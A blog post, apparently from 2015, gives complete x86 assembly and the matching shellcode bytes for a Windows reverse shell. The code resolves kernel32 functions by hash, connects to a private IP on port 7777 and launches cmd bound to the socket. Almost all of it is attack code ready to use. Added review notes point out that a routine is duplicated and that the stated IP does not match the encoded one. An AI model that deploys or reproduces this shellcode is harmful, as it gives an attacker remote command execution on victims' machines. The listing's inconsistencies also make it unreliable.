Windows reverse shell universal shellcode

Written by  on August 29, 2015 

Here it goes:

1) resolve the needed functions from kernel32 and push them on the stack

2) load and initialize the Winsock library

3) create a socket and connect to 192.168.11.7 on port 7777

4) allocate space for the needed structs

5) use CreateProcess to spawn a shell

6) profit

Of course this could be done better; it was just a game for me (great for refreshing a few asm concepts).

; ly0n.me
;-----------------------------------------------------------------------
; Stage 1: build the "cmd" string and resolve the kernel32 imports.
; Syntax: Intel (MASM-style), 32-bit, position-independent.
; On exit from this stage the stack (edx = its base) holds, low to high:
;   [edx+00h] ExitProcess     [edx+04h] CreateProcessA  [edx+08h] GetProcAddress
;   [edx+0Ch] GetModuleHandle [edx+10h] LoadLibraryA    [edx+14h] "cmd\0"
; and eax = the last address resolved (LoadLibraryA), which stage 2 calls.
;-----------------------------------------------------------------------
mov eax, 646d6301h      ; bytes 01 63 6D 64; the low 01 is presumably a filler so the
sar eax, 08h            ; immediate holds no NUL byte; shifting it out leaves eax = "cmd\0"
push eax ; cmd. to stack for later use
 
; Resolve Kernel32 Functions
; push array of hashes in stack
; Each value is the ROR-13 hash of an export name (see find_function_kernel32);
; the loop below overwrites each slot in place with the resolved address.
push 74776072h ; LoadLibraryA
push 48269992h ; GetModuleHandle
push 0E553E06Fh ; GetProcAddress
push 0F390B59Fh ; CreateProcessA
push 0C3F39F16h ; ExitProcess
call find_kernel32 ; Resolve kernel 32 -> eax = kernel32 image base

mov ebp, eax ; store kernel base addr (find_function_kernel32 expects it in ebp)
xor ecx, ecx ; zero ecx for counter (byte offset of the current hash slot)
mov esi, 14h ; array size (5 hashes * 4 bytes)
mov edx, esp ; save esp addr (base of the hash array)

; loop through all pieces of array
; Invariant: edx = array base, ecx = slot offset, ebp = kernel32 base, esi = 14h.
loadhash:
mov ebx, [esp + ecx]    ; ebx = hash of the slot being resolved
add esp, 18h            ; esp = edx + 2Eh + ecx: esp is moved above the array so the
add esp, ecx            ; four pushes and the return address below land above it
                        ; (on whatever the caller had there) rather than on the array

add esp, 16h
push ebp ; save registers
push ecx
push esi
push edx

call find_function_kernel32 ; eax = address of the export whose hash is in ebx

pop edx ; restore registers
pop esi
pop ecx
pop ebp
sub esp, 16h            ; esp = edx + 18h + ecx, so [esp - 18h] is the current slot

mov [esp – 18h ], eax ; converts hash of function to function address
                      ; NOTE(review): the dash is rendered as an en dash here; the
                      ; encoded bytes at the end of the page (89 44 24 E8) show a
                      ; plain minus, i.e. [esp - 18h]

mov esp, edx ; restore esp
add cl, 4h              ; next slot (byte-sized add; presumably to keep the encoding NUL-free)
cmp ecx, esi
jne loadhash

; start working with winsock
;-----------------------------------------------------------------------
; Stage 2: LoadLibraryA("ws2_32.dll"), WSAStartup, WSASocketA, connect.
; All calls are stdcall, so each callee pops its own arguments; the fixed
; stack offsets used below (28h) depend on that.
; Registers on exit: esi = ws2_32 module handle, ebx = GetProcAddress,
; ebp = connected socket handle, edi = address of the "connect" string.
;-----------------------------------------------------------------------
push 00006C6Ch ; we push winsock lib name in stack ("ll\0\0")
push 642E3233h ; "32.d"
push 5F327377h ; "ws2_" -> esp now points at "ws2_32.dll\0"
mov edi,esp
push edi
call eax ; winsock library loaded (eax = LoadLibraryA from stage 1)
mov esi, eax ; save winsock handle in esi
push 00007075h ; "up\0\0"
push 74726174h ; "tart"
push 53415357h ; push WSASTART in stack -> "WSAStartup\0"
mov edi, esp
push edi ; parameter 1 (lpProcName)
push esi ; parameter 2 (hModule)

mov edx, [esp + 28h] ; call getprocaddress of wsastartup
                     ; esp is 20h below the hash array here (two 12-byte strings
                     ; plus two arguments), so [esp+28h] = array+8 = GetProcAddress
mov ebx, edx         ; keep GetProcAddress in ebx for the later lookups
call edx ; make call efective -> eax = WSAStartup

mov ecx, eax ; wsastartup addr -> ecx
mov eax, 0190h ; socket struct size (400 bytes, the 32-bit WSADATA size)
sub esp, eax ; adjusting the stack (reserve the WSADATA buffer)
push esp ; parameter 1 (lpWSAData)
push eax ; parameter 2 (wVersionRequested; the same 190h value is reused as the version word)
call ecx ; we got windows socket ready to initialize

mov eax, ebx ; getprocaddress eax
push 00004174h ; WSASocket ("tA\0\0")
push 656b636fh ; "ocke"
push 53415357h ; "WSAS" -> "WSASocketA\0"
mov edi, esp
push edi ; parameter 1 (lpProcName)
push esi ; parameter 2 (hModule)
call eax ; WSASocket in EAX

xor edx, edx ; zero edx
push edx ; push parameters of WSASocket to stack, right to left:
push edx ;   dwFlags = 0, g = 0, lpProtocolInfo = NULL, protocol = 0
push edx
push edx
inc edx
push edx ;   type = 1 (SOCK_STREAM)
inc edx
push edx ;   af = 2 (AF_INET)
call eax ; create a valid socket file descriptor -> eax (not checked for INVALID_SOCKET)

mov ebp, eax ; save file descriptor in ebp
push 00746365h ; connect function ("ect\0")
push 6e6e6f63h ; "conn" -> "connect\0"
mov edi, esp
push edi ; push parameters (lpProcName)
push esi ;   hModule
call ebx ; call getprocaddress -> eax = connect

; Build a sockaddr_in on the stack (high dword pushed first).
push 040BA8C0h ; 192.168.11.4 in network byte order (bytes C0 A8 0B 04)
               ; NOTE(review): the write-up above says .7; the constant encodes .4
mov edx, 611E0102h ; sin_port = 1E61h in network byte order = 7777; sin_family below
dec dh             ; 0102h -> 0002h = AF_INET (presumably so the immediate holds no NUL byte)
push edx
mov ecx, esp       ; ecx = &sockaddr_in
xor edx, edx
mov dl, 10h        ; namelen = sizeof(sockaddr_in) = 16
push edx ; push parameters (namelen)
push ecx ;   name
push ebp ; ebp contains socket file descriptor
call eax           ; connect(s, &addr, 16); the return value is not checked

nop
;-----------------------------------------------------------------------
; Stage 3: CreateProcessA("cmd") with stdin/stdout/stderr set to the socket,
; then ExitProcess.
; Layout: edi = STARTUPINFOA (44h bytes), esi = PROCESS_INFORMATION (10h bytes)
; immediately after it; together they are the 54h-byte region zeroed below.
;-----------------------------------------------------------------------
xor ecx, ecx ; allocate space in stack for startupInfo data structure
mov cl, 54h  ; 44h (STARTUPINFOA) + 10h (PROCESS_INFORMATION)
sub esp, ecx
mov ebx, esp
push ebx
xor eax, eax
rep stosb ; create a proper buffer for data structures: zero 54h bytes at edi.
          ; edi still holds the address of the old "connect" string, which (after
          ; connect's stdcall cleanup) is exactly 5Ch above the esp saved in ebx,
          ; so this zeroes the same region edi points at after the pop/add below
pop edi
add edi, 5Ch ; adjust the stack: edi = start of the zeroed region (STARTUPINFOA)
mov byte ptr[edi], 44h      ; STARTUPINFOA.cb = sizeof(STARTUPINFOA)
inc byte ptr [edi + 2dh]    ; dwFlags (offset 2Ch) |= 100h = STARTF_USESTDHANDLES
push edi
mov eax, ebp                ; eax = socket handle
lea edi, [edi + 38h]        ; &hStdInput
stosd                       ; hStdInput  = socket
stosd                       ; hStdOutput = socket
stosd                       ; hStdError  = socket
pop edi
xor eax, eax
lea esi, [edi + 44h] ; size of struct -> esi = &PROCESS_INFORMATION, right after STARTUPINFOA
; CreateProcessA arguments, pushed right to left:
push esi ; push parameters -> lpProcessInformation
push edi ;   lpStartupInfo
push eax ;   lpCurrentDirectory = NULL
push eax ;   lpEnvironment = NULL
push eax ;   dwCreationFlags = 0
inc eax
push eax ;   bInheritHandles = TRUE (required for the socket to be inherited as the std handles)
dec eax
push eax ;   lpThreadAttributes = NULL
push eax ;   lpProcessAttributes = NULL
mov edi, esp
add edi, 24Ch ; cmd. in the stack: the "cmd\0" dword pushed at the very start
push edi ;   lpCommandLine = "cmd"
push eax ;   lpApplicationName = NULL
nop
mov eax, [esp + 244h] ; createprocess in the stack (hash-array slot 1)
call eax              ; return value not checked
mov eax, [esp + 218h] ; load exitprocess (slot 0: 244h minus the 28h popped by CreateProcessA, minus 4)
call eax ; bye bye P-)

;find kernel 32
;-----------------------------------------------------------------------
; find_kernel32: locate the kernel32.dll image base via the PEB.
; In:       nothing (reads fs:[30h])
; Out:      eax = kernel32 base
; Clobbers: eax, flags (esi is saved and restored)
; Walks PEB -> Ldr -> InInitializationOrderModuleList and returns the DllBase
; of the second entry. That this entry is kernel32 holds on XP/Vista (the
; systems the write-up lists); on later Windows versions the list order is
; reported to differ, so this lookup is version dependent.
;-----------------------------------------------------------------------
find_kernel32:
push esi ;save ESI reg
xor eax, eax ; 0 eax
mov eax, fs:[eax+30h] ; PEB
mov eax, [eax + 0ch] ; calculate addr -> PEB.Ldr
mov esi, [eax + 1ch] ; Ldr.InInitializationOrderModuleList.Flink (first entry)
lodsd ; eax = that entry's Flink, i.e. the second entry
mov eax, [eax + 8h] ; eax = kernel32 base addr (DllBase field of the entry)
pop esi ; restore ESI
ret ; ret with base addr

;find function in kernel 32 ; ebp =  kernel32 base ; ebx = function hash
;-----------------------------------------------------------------------
; find_function_kernel32: resolve a kernel32 export by hashed name.
; In:       ebp = kernel32 base, ebx = ROR-13 hash of the export name
; Out:      eax = address of the export
; Clobbers: eax, ebx, ecx, edx, esi, edi, flags (the caller saves what it needs)
; Hash:     h = 0; for every byte of the name, including the terminating NUL:
;           h = ror(h, 13) + byte.
; Walks the PE export directory: AddressOfNames (+20h) is scanned linearly,
; the matching index is mapped through AddressOfNameOrdinals (+24h) into
; AddressOfFunctions (+1Ch). The scan has no upper bound: a hash that matches
; nothing keeps reading past the end of the name table.
;-----------------------------------------------------------------------
find_function_kernel32:
xor ecx,ecx                          ; ecx = current name index
mov edi,dword ptr ss:[ebp+3ch]       ; e_lfanew
mov edi,dword ptr ss:[ebp+edi+78h]   ; export directory RVA (first data directory entry)
add edi,ebp                          ; edi = IMAGE_EXPORT_DIRECTORY*
next_function_pointer:
mov edx,dword ptr ds:[edi+20h]       ; AddressOfNames RVA
add edx,ebp
mov esi,dword ptr ds:[edx+ecx*4]     ; RVA of the ecx-th name
add esi,ebp                          ; esi = name string
xor eax,eax
cdq                                  ; edx = 0 (running hash); eax is 0 so cdq clears edx
hash_next_byte:
lods byte ptr ds:[esi]
ror edx,0dh
add edx,eax
test al,al
jnz short hash_next_byte             ; the NUL byte is folded into the hash before the exit test
inc ecx
cmp edx,ebx
jnz short next_function_pointer
dec ecx                              ; ecx = index of the matching name
mov ebx,dword ptr ds:[edi+24h]       ; AddressOfNameOrdinals RVA
add ebx,ebp
mov cx,word ptr ds:[ebx+ecx*2h]      ; 16-bit write: the upper half of ecx keeps the upper
                                     ; half of the old index, which is 0 for any realistic table
mov ebx,dword ptr ds:[edi+1ch]       ; AddressOfFunctions RVA
add ebx,ebp
mov eax,dword ptr ds:[ebx+ecx*4h]    ; function RVA
add eax,ebp
ret                                  ; eax = export address
; NOTE(review): the routine below is a verbatim duplicate of the
; find_function_kernel32 routine above, most likely a copy/paste artifact in
; the post. The byte dump at the end of the page contains the routine only
; once, and most assemblers will reject the redefined labels if this listing
; is assembled as-is. See the copy above for the documentation.
find_function_kernel32:
xor ecx,ecx
mov edi,dword ptr ss:[ebp+3ch]
mov edi,dword ptr ss:[ebp+edi+78h]
add edi,ebp
next_function_pointer:
mov edx,dword ptr ds:[edi+20h]
add edx,ebp
mov esi,dword ptr ds:[edx+ecx*4]
add esi,ebp
xor eax,eax
cdq
hash_next_byte:
lods byte ptr ds:[esi]
ror edx,0dh
add edx,eax
test al,al
jnz short hash_next_byte
inc ecx
cmp edx,ebx
jnz short next_function_pointer
dec ecx
mov ebx,dword ptr ds:[edi+24h]
add ebx,ebp
mov cx,word ptr ds:[ebx+ecx*2h]
mov ebx,dword ptr ds:[edi+1ch]
add ebx,ebp
mov eax,dword ptr ds:[ebx+ecx*4h]
add eax,ebp
ret

 

shellcode bytes (note that they contain null bytes):

\xB8\x01\x63\x6D\x64\xC1\xF8\x08\x50\x68\x72\x60\x77\x74\x68\x92\x99\x26\x48\x68\x6F\xE0\x53\xE5\x68\x9F\xB5\x90\xF3\x68\x16\x9F
\xF3\xC3\xE8\x0C\x01\x00\x00\x8B\xE8\x33\xC9\xBE\x14\x00\x00\x00\x8B\xD4\x8B\x1C\x0C\x83\xC4\x18\x03\xE1\x83\xC4\x16\x55\x51\x56
\x52\xE8\x00\x01\x00\x00\x5A\x5E\x59\x5D\x83\xEC\x16\x89\x44\x24\xE8\x8B\xE2\x80\xC1\x04\x3B\xCE\x75\xD8\x68\x6C\x6C\x00\x00\x68
\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x8B\xFC\x57\xFF\xD0\x8B\xF0\x68\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8B
\xFC\x57\x56\x8B\x54\x24\x28\x8B\xDA\xFF\xD2\x8B\xC8\xB8\x90\x01\x00\x00\x2B\xE0\x54\x50\xFF\xD1\x8B\xC3\x68\x74\x41\x00\x00\x68
\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x8B\xFC\x57\x56\xFF\xD0\x33\xD2\x52\x52\x52\x52\x42\x52\x42\x52\xFF\xD0\x8B\xE8\x68\x65\x63
\x74\x00\x68\x63\x6F\x6E\x6E\x8B\xFC\x57\x56\xFF\xD3\x68\xC0\xA8\x0B\x04\xBA\x02\x01\x1E\x61\xFE\xCE\x52\x8B\xCC\x33\xD2\xB2\x10
\x52\x51\x55\xFF\xD0\x90\x33\xC9\xB1\x54\x2B\xE1\x8B\xDC\x53\x33\xC0\xF3\xAA\x5F\x83\xC7\x5C\xC6\x07\x44\xFE\x47\x2D\x57\x8B\xC5
\x8D\x7F\x38\xAB\xAB\xAB\x5F\x33\xC0\x8D\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\x8B\xFC\x81\xC7\x4C\x02\x00\x00\x57\x50
\x90\x8B\x84\x24\x44\x02\x00\x00\xFF\xD0\x8B\x84\x24\x18\x02\x00\x00\xFF\xD0\x56\x33\xC0\x64\x8B\x40\x30\x8B\x40\x0C\x8B\x70\x1C
\xAD\x8B\x40\x08\x5E\xC3\x33\xC9\x8B\x7D\x3C\x36\x8B\x7C\x2F\x78\x03\xFD\x8B\x57\x20\x03\xD5\x8B\x34\x8A\x03\xF5\x33\xC0\x99\xAC
\xC1\xCA\x0D\x03\xD0\x84\xC0\x75\xF6\x41\x3B\xD3\x75\xE4\x49\x8B\x5F\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5F\x1C\x03\xDD\x8B\x04\x8B
\x03\xC5\xC3

 

Tested on Windows XP and Windows Vista

